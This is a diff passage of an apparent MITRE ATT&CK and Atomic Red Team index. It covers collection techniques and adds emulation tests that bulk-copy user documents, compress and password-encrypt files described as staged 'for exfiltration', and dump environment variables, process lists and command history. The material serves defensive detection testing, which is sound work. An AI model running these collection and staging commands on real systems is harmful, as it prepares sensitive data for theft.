+ This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)
+ id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ modified: '2020-03-24T21:16:16.580Z'
+ created: '2020-02-11T18:59:50.058Z'
+ x_mitre_system_requirements:
+ - An externally facing login portal is configured.
+ x_mitre_data_sources:
+ - File monitoring
+ x_mitre_detection: File monitoring may be used to detect changes to files in
+ the Web directory for organization login pages that do not match with authorized
+ updates to the Web server's content.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
+ atomic_tests: []
+collection:
+ T1557.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1557.002
+ url: https://attack.mitre.org/techniques/T1557/002
+ - source_name: RFC826 ARP
+ url: https://tools.ietf.org/html/rfc826
+ description: Plummer, D. (1982, November). An Ethernet Address Resolution
+ Protocol. Retrieved October 15, 2020.
+ - source_name: Sans ARP Spoofing Aug 2003
+ url: https://pen-testing.sans.org/resources/papers/gcih/real-world-arp-spoofing-105411
+ description: Siles, R. (2003, August). Real World ARP Spoofing. Retrieved
+ October 15, 2020.
+ - source_name: Cylance Cleaver
+ description: Cylance. (2014, December). Operation Cleaver. Retrieved September
+ 14, 2017.
+ url: https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: ARP Cache Poisoning
+ description: |
+ Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).
+
+ The ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache.
+
+ An adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.
+
+ The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
+
+ Adversaries may use ARP cache poisoning as a means to man-in-the-middle (MiTM) network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
+ id: attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-10-16T15:22:11.604Z'
+ created: '2020-10-15T12:05:58.755Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
+ ARP replies may be suspicious. \n\nConsider collecting changes to ARP caches
+ across endpoints for signs of ARP poisoning. For example, if multiple IP addresses
+ map to a single MAC address, this could be an indicator that the ARP cache
+ has been poisoned."
+ x_mitre_data_sources:
+ - Packet capture
+ - Netflow/Enclave netflow
+ x_mitre_contributors:
+ - Jon Sternstein, Stern Security
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ atomic_tests: []
+ T1560:
+ technique:
+ id: attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a
+ description: |-
+ An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
+
+ Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.
+ name: Archive Collected Data
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1560
+ url: https://attack.mitre.org/techniques/T1560
+ - url: https://en.wikipedia.org/wiki/List_of_file_signatures
+ description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
+ April 22, 2016.
+ source_name: Wikipedia File Header Signatures
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-10-21T16:36:55.831Z'
+ created: '2020-02-20T20:53:45.725Z'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ - File monitoring
+ - Binary file metadata
+ x_mitre_detection: |-
+ Archival software and archived files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
+
+ A process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures.
+
+ Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
+ identifier: T1560
+ atomic_tests:
+ - name: Compress Data for Exfiltration With PowerShell
+ auto_generated_guid: 41410c60-614d-4b9d-b66e-b0192dd9c597
+ description: "An adversary may compress data (e.g., sensitive documents) that
+ is collected prior to exfiltration.\nWhen the test completes you should find
+ the files from the $env:USERPROFILE directory compressed in a file called
+ T1560-data-ps.zip in the $env:USERPROFILE directory \n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ input_file:
+ description: Path that should be compressed into our output file
+ type: Path
+ default: "$env:USERPROFILE"
+ output_file:
+ description: Path where resulting compressed data should be placed
+ type: Path
+ default: "$env:USERPROFILE\\T1560-data-ps.zip"
+ executor:
+ name: powershell
+ elevation_required: false
+ command: 'dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
+
+'
+ cleanup_command: 'Remove-Item -path #{output_file} -ErrorAction Ignore'
+ T1560.003:
+ technique:
+ created: '2020-02-20T21:09:55.995Z'
+ modified: '2020-03-25T22:48:14.605Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ type: attack-pattern
+ id: attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b
+ description: 'An adversary may compress or encrypt data that is collected prior
+ to exfiltration using a custom method. Adversaries may choose to use custom
+ archival methods, such as encryption with XOR or stream ciphers implemented
+ with no external library or utility references. Custom implementations of
+ well-known compression algorithms have also been used.(Citation: ESET Sednit
+ Part 2)'
+ name: Archive via Custom Method
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1560.003
+ url: https://attack.mitre.org/techniques/T1560/003
+ - url: http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf
+ description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
+ the Comings and Goings. Retrieved November 21, 2016.'
+ source_name: ESET Sednit Part 2
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_detection: Custom archival methods can be very difficult to detect,
+ since many of them use standard programming language concepts, such as bitwise
+ operations.
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
+ atomic_tests: []
+ T1560.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1560.002
+ url: https://attack.mitre.org/techniques/T1560/002
+ - source_name: PyPI RAR
+ url: https://pypi.org/project/rarfile/
+ description: mkz. (2020). rarfile 3.1. Retrieved February 20, 2020.
+ - source_name: libzip
+ url: https://libzip.org/
+ description: D. Baron, T. Klausner. (2020). libzip. Retrieved February 20,
+ 2020.
+ - source_name: Zlib Github
+ url: https://github.com/madler/zlib
+ description: madler. (2017). zlib. Retrieved February 20, 2020.
+ - url: https://en.wikipedia.org/wiki/List_of_file_signatures
+ description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
+ April 22, 2016.
+ source_name: Wikipedia File Header Signatures
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Archive via Library
+ description: |-
+ An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
+
+ Some archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.
+ id: attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-03-29T18:27:30.891Z'
+ created: '2020-02-20T21:08:52.529Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: |-
+ Monitor processes for accesses to known archival libraries. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
+
+ Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ atomic_tests: []
+ T1560.001:
+ technique:
+ created: '2020-02-20T21:01:25.428Z'
+ modified: '2020-03-25T21:54:37.374Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ type: attack-pattern
+ id: attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662
+ description: |-
+ An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities. Many utilities exist that can archive data, including 7-Zip(Citation: 7zip Homepage), WinRAR(Citation: WinRAR Homepage), and WinZip(Citation: WinZip Homepage). Most utilities include functionality to encrypt and/or compress data.
+
+ Some 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS or `zip` on Windows systems.
+ name: Archive via Utility
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1560.001
+ url: https://attack.mitre.org/techniques/T1560/001
+ - source_name: 7zip Homepage
+ url: https://www.7-zip.org/
+ description: I. Pavlov. (2019). 7-Zip. Retrieved February 20, 2020.
+ - source_name: WinRAR Homepage
+ url: https://www.rarlab.com/
+ description: A. Roshal. (2020). RARLAB. Retrieved February 20, 2020.
+ - source_name: WinZip Homepage
+ url: https://www.winzip.com/win/en/
+ description: Corel Corporation. (2020). WinZip. Retrieved February 20, 2020.
+ - url: https://en.wikipedia.org/wiki/List_of_file_signatures
+ description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
+ April 22, 2016.
+ source_name: Wikipedia File Header Signatures
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ - File monitoring
+ - Binary file metadata
+ x_mitre_detection: |-
+ Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
+
+ Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ identifier: T1560.001
+ atomic_tests:
+ - name: Compress Data for Exfiltration With Rar
+ auto_generated_guid: 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0
+ description: "An adversary may compress data (e.g., sensitive documents) that
+ is collected prior to exfiltration.\nWhen the test completes you should find
+ the txt files from the %USERPROFILE% directory compressed in a file called
+ T1560.001-data.rar in the %USERPROFILE% directory \n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ input_path:
+ description: Path that should be compressed into our output file
+ type: Path
+ default: "%USERPROFILE%"
+ file_extension:
+ description: Extension of files to compress
+ type: String
+ default: ".txt"
+ output_file:
+ description: Path where resulting compressed data should be placed
+ type: Path
+ default: "%USERPROFILE%\\T1560.001-data.rar"
+ rar_installer:
+ description: Winrar installer
+ type: Path
+ default: "%TEMP%\\winrar.exe"
+ rar_exe:
+ description: The RAR executable from Winrar
+ type: Path
+ default: "%programfiles%/WinRAR/Rar.exe"
+ dependencies:
+ - description: 'Rar tool must be installed at specified location (#{rar_exe})
+
+'
+ prereq_command: 'if not exist "#{rar_exe}" (exit /b 1)
+
+'
+ get_prereq_command: |
+ echo Downloading Winrar installer
+ bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer}
+ echo Follow the installer prompts to install Winrar
+ #{rar_installer}
+ executor:
+ name: command_prompt
+ elevation_required: false
+ command: '"#{rar_exe}" a -r #{output_file} #{input_path}\*#{file_extension}
+
+'
+ cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1
+
+'
+ - name: Compress Data and lock with password for Exfiltration with winrar
+ auto_generated_guid: 8dd61a55-44c6-43cc-af0c-8bdda276860c
+ description: |
+ Note: Requires winrar installation
+ rar a -p"blue" hello.rar (VARIANT)
+ supported_platforms:
+ - windows
+ executor:
+ name: command_prompt
+ elevation_required: false
+ command: |
+ mkdir .\tmp\victim-files
+ cd .\tmp\victim-files
+ echo "This file will be encrypted" > .\encrypted_file.txt
+ rar a -hp"blue" hello.rar
+ dir
+ - name: Compress Data and lock with password for Exfiltration with winzip
+ auto_generated_guid: 01df0353-d531-408d-a0c5-3161bf822134
+ description: |
+ Note: Requires winzip installation
+ wzzip sample.zip -s"blueblue" *.txt (VARIANT)
+ supported_platforms:
+ - windows
+ input_arguments:
+ winzip_exe:
+ description: Path to installed Winzip executable
+ type: Path
+ default: "%ProgramFiles%\\WinZip\\winzip64.exe"
+ winzip_url:
+ description: Path to download Windows Credential Editor zip file
+ type: url
+ default: https://download.winzip.com/gl/nkln/winzip24-home.exe
+ winzip_hash:
+ description: File hash of the Windows Credential Editor zip file
+ type: String
+ default: B59DB592B924E963C21DA8709417AC0504F6158CFCB12FE5536F4A0E0D57D7FB
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Winzip must be installed
+
+'
+ prereq_command: 'cmd /c ''if not exist "#{winzip_exe}" (echo 1) else (echo
+ 0)''
+
+'
+ get_prereq_command: |
+ if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){
+ Write-Host Follow the installation prompts to continue
+ cmd /c "$env:Temp\winzip.exe"
+ }
+ executor:
+ name: command_prompt
+ elevation_required: false
+ command: |
+ path=%path%;"C:\Program Files (x86)\winzip"
+ mkdir .\tmp\victim-files
+ cd .\tmp\victim-files
+ echo "This file will be encrypted" > .\encrypted_file.txt
+ "#{winzip_exe}" -min -a -s"hello" archive.zip *
+ dir
+ - name: Compress Data and lock with password for Exfiltration with 7zip
+ auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198
+ description: 'Note: Requires 7zip installation
+
+'
+ supported_platforms:
+ - windows
+ executor:
+ name: command_prompt
+ elevation_required: false
+ command: |
+ mkdir $PathToAtomicsFolder\T1560.001\victim-files
+ cd $PathToAtomicsFolder\T1560.001\victim-files
+ echo "This file will be encrypted" > .\encrypted_file.txt
+ 7z a archive.7z -pblue
+ dir
+ - name: Data Compressed - nix - zip
+ auto_generated_guid: c51cec55-28dd-4ad2-9461-1eacbc82c3a0
+ description: 'An adversary may compress data (e.g., sensitive documents) that
+ is collected prior to exfiltration. This test uses standard zip compression.
+
+'
+ supported_platforms:
+ - linux
+ - macos
+ input_arguments:
+ input_files:
+ description: Path that should be compressed into our output file, may include
+ wildcards
+ type: Path
+ default: "$HOME/*.txt"
+ output_file:
+ description: Path that should be output as a zip archive
+ type: Path
+ default: "$HOME/data.zip"
+ dependencies:
+ - description: 'Files to zip must exist (#{input_files})
+
+'
+ prereq_command: 'if [ $(ls #{input_files} | wc -l) > 0 ]; then exit 0; else
+ exit 1; fi;
+
+'
+ get_prereq_command: 'echo Please set input_files argument to include files
+ that exist
+
+'
+ executor:
+ name: sh
+ elevation_required: false
+ command: 'zip #{output_file} #{input_files}
+
+'
+ cleanup_command: 'rm -f #{output_file}
+
+'
+ - name: Data Compressed - nix - gzip Single File
+ auto_generated_guid: cde3c2af-3485-49eb-9c1f-0ed60e9cc0af
+ description: 'An adversary may compress data (e.g., sensitive documents) that
+ is collected prior to exfiltration. This test uses standard gzip compression.
+
+'
+ supported_platforms:
+ - linux
+ - macos
+ input_arguments:
+ input_file:
+ description: Path that should be compressed
+ type: Path
+ default: "$HOME/victim-gzip.txt"
+ input_content:
+ description: contents of compressed files if file does not already exist.
+ default contains test credit card and social security number
+ type: String
+ default: 'confidential! SSN: 078-05-1120 - CCN: 4000 1234 5678 9101'
+ executor:
+ name: sh
+ elevation_required: false
+ command: 'test -e #{input_file} && gzip -k #{input_file} || (echo ''#{input_content}''
+ >> #{input_file}; gzip -k #{input_file})
+
+'
+ cleanup_command: 'rm -f #{input_file}.gz
+
+'
+ - name: Data Compressed - nix - tar Folder or File
+ auto_generated_guid: 7af2b51e-ad1c-498c-aca8-d3290c19535a
+ description: 'An adversary may compress data (e.g., sensitive documents) that
+ is collected prior to exfiltration. This test uses standard gzip compression.
+
+'
+ supported_platforms:
+ - linux
+ - macos
+ input_arguments:
+ input_file_folder:
+ description: Path that should be compressed
+ type: Path
+ default: "$HOME/$USERNAME"
+ output_file:
+ description: File that should be output
+ type: Path
+ default: "$HOME/data.tar.gz"
+ dependencies:
+ - description: 'Folder to zip must exist (#{input_file_folder})
+
+'
+ prereq_command: 'test -e #{input_file_folder}
+
+'
+ get_prereq_command: 'echo Please set input_file_folder argument to a folder
+ that exists
+
+'
+ executor:
+ name: sh
+ elevation_required: false
+ command: 'tar -cvzf #{output_file} #{input_file_folder}
+
+'
+ cleanup_command: 'rm -f #{output_file}
+
+'
+ - name: Data Encrypted with zip and gpg symmetric
+ auto_generated_guid: '0286eb44-e7ce-41a0-b109-3da516e05a5f'
+ description: 'Encrypt data for exiltration
+
+'
+ supported_platforms:
+ - macos
+ - linux
+ input_arguments:
+ test_folder:
+ description: Path used to store files.
+ type: Path
+ default: "/tmp/T1560"
+ test_file:
+ description: Temp file used to store encrypted data.
+ type: Path
+ default: T1560
+ encryption_password:
+ description: Password used to encrypt data.
+ type: string
+ default: InsertPasswordHere
+ dependency_executor_name: sh
+ dependencies:
+ - description: gpg and zip are required to run the test.
+ prereq_command: 'if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)"
+ ]; then exit 1; fi;
+
+'
+ get_prereq_command: 'echo "Install gpg and zip to run the test"; exit 1;
+
+'
+ executor:
+ name: sh
+ elevation_required: false
+ command: |
+ mkdir -p #{test_folder}
+ cd #{test_folder}; touch a b c d e f g
+ zip --password "#{encryption_password}" #{test_folder}/#{test_file} ./*
+ echo "#{encryption_password}" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/#{test_file}.zip.gpg -c #{test_folder}/#{test_file}.zip
+ ls -l #{test_folder}
+ cleanup_command: 'rm -Rf #{test_folder}'
+ T1123:
+ technique:
+ id: attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Audio Capture
+ description: |-
+ An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.
+
+ Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1123
+ external_id: T1123
+ - external_id: CAPEC-634
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/634.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-07-14T19:42:10.235Z'
+ created: '2017-05-31T21:31:34.528Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.
+
+ Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.
+ x_mitre_data_sources:
+ - API monitoring
+ - Process monitoring
+ - File monitoring
+ x_mitre_version: '1.0'
+ identifier: T1123
+ atomic_tests:
+ - name: using device audio capture commandlet
+ auto_generated_guid: 9c3ad250-b185-4444-b5a9-d69218a10c95
+ description: "[AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet)\n"
+ supported_platforms:
+ - windows
+ executor:
+ command: 'powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
+
+'
+ name: powershell
+ T1119:
+ technique:
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1119
+ external_id: T1119
+ description: "Once established within a system or network, an adversary may
+ use automated techniques for collecting internal data. Methods for performing
+ this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)
+ to search for and copy information fitting set criteria such as file type,
+ location, or name at specific time intervals. This functionality could also
+ be built into remote access tools. \n\nThis technique may incorporate use
+ of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)
+ and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to
+ identify and move files."
+ name: Automated Collection
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-03-31T22:18:43.019Z'
+ created: '2017-05-31T21:31:27.985Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Data loss prevention
+ - Process command-line parameters
+ x_mitre_detection: Depending on the method used, actions could include common
+ file system commands and parameters on the command-line interface within batch
+ files or scripts. A sequence of actions like this may be unusual, depending
+ on the system and network environment. Automated collection may occur along
+ with other techniques such as [Data Staged](https://attack.mitre.org/techniques/T1074).
+ As such, file access monitoring that shows an unusual process performing sequential
+ file opens and potentially copy actions to another location on the file system
+ for many files at once may indicate automated collection behavior. Remote
+ access tools with built-in features may interact directly with the Windows
+ API to gather data. Data may also be acquired through Windows system management
+ tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_system_requirements:
+ - Permissions to access directories and files that store information of interest.
+ identifier: T1119
+ atomic_tests:
+ - name: Automated Collection Command Prompt
+ auto_generated_guid: cb379146-53f1-43e0-b884-7ce2c635ff5b
+ description: |
+ Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_command_prompt_collection
+ to see what was collected.
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ mkdir %temp%\T1119_command_prompt_collection >nul 2>&1
+ dir c: /b /s .docx | findstr /e .docx
+ for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection
+ cleanup_command: 'del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1
+
+'
+ name: command_prompt
+ - name: Automated Collection PowerShell
+ auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313
+ description: |
+ Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_powershell_collection
+ to see what was collected.
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ New-Item -Path $env:TEMP\T1119_powershell_collection -ItemType Directory -Force | Out-Null
+ Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination $env:TEMP\T1119_powershell_collection}
+ cleanup_command: 'Remove-Item $env:TEMP\T1119_powershell_collection -Force
+ -ErrorAction Ignore | Out-Null
+
+'
+ name: powershell
+ - name: Recon information for export with PowerShell
+ auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26
+ description: |
+ collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt
+ to see what was collected.
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ Get-Service > $env:TEMP\T1119_1.txt
+ Get-ChildItem Env: > $env:TEMP\T1119_2.txt
+ Get-Process > $env:TEMP\T1119_3.txt
+ cleanup_command: |
+ Remove-Item $env:TEMP\T1119_1.txt -ErrorAction Ignore
+ Remove-Item $env:TEMP\T1119_2.txt -ErrorAction Ignore
+ Remove-Item $env:TEMP\T1119_3.txt -ErrorAction Ignore
+ name: powershell
+ - name: Recon information for export with Command Prompt
+ auto_generated_guid: aa1180e2-f329-4e1e-8625-2472ec0bfaf3
+ description: |
+ collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt
+ to see what was collected.
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ sc query type=service > %TEMP%\T1119_1.txt
+ doskey /history > %TEMP%\T1119_2.txt
+ wmic process list > %TEMP%\T1119_3.txt
+ tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt
+ cleanup_command: |
+ del %TEMP%\T1119_1.txt >nul 2>&1
+ del %TEMP%\T1119_2.txt >nul 2>&1
+ del %TEMP%\T1119_3.txt >nul 2>&1
+ del %TEMP%\T1119_4.txt >nul 2>&1
+ name: command_prompt
+ T1115:
+ technique:
+ id: attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Clipboard Data
+ description: "Adversaries may collect data stored in the clipboard from users
+ copying information within or between applications. \n\nIn Windows, Applications
+ can access clipboard data by using the Windows API.(Citation: MSDN Clipboard)
+ OSX provides a native command, pbpaste, to grab clipboard contents.(Citation:
+ Operating with EmPyre)"
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1115
+ url: https://attack.mitre.org/techniques/T1115
+ - external_id: CAPEC-637
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/637.html
+ - url: https://msdn.microsoft.com/en-us/library/ms649012
+ description: Microsoft. (n.d.). About the Clipboard. Retrieved March 29, 2016.
+ source_name: MSDN Clipboard
+ - url: https://medium.com/rvrsh3ll/operating-with-empyre-ea764eda3363
+ description: rvrsh3ll. (2016, May 18). Operating with EmPyre. Retrieved July
+ 12, 2017.
+ source_name: Operating with EmPyre
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ modified: '2020-04-23T18:35:58.230Z'
+ created: '2017-05-31T21:31:25.967Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_detection: Access to the clipboard is a legitimate function of many
+ applications on an operating system. If an organization chooses to monitor
+ for this behavior, then the data will likely need to be correlated against
+ other suspicious or non-user-driven activity.
+ x_mitre_data_sources:
+ - API monitoring
+ x_mitre_version: '1.1'
+ identifier: T1115
+ atomic_tests:
+ - name: Utilize Clipboard to store or execute commands from
+ auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7
+ description: 'Add data to clipboard to copy off or execute commands from.
+
+'
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ dir | clip
+ echo "T1115" > %temp%\T1115.txt
+ clip < %temp%\T1115.txt
+ cleanup_command: 'del %temp%\T1115.txt >nul 2>&1
+
+'
+ name: command_prompt
+ - name: Execute Commands from Clipboard using PowerShell
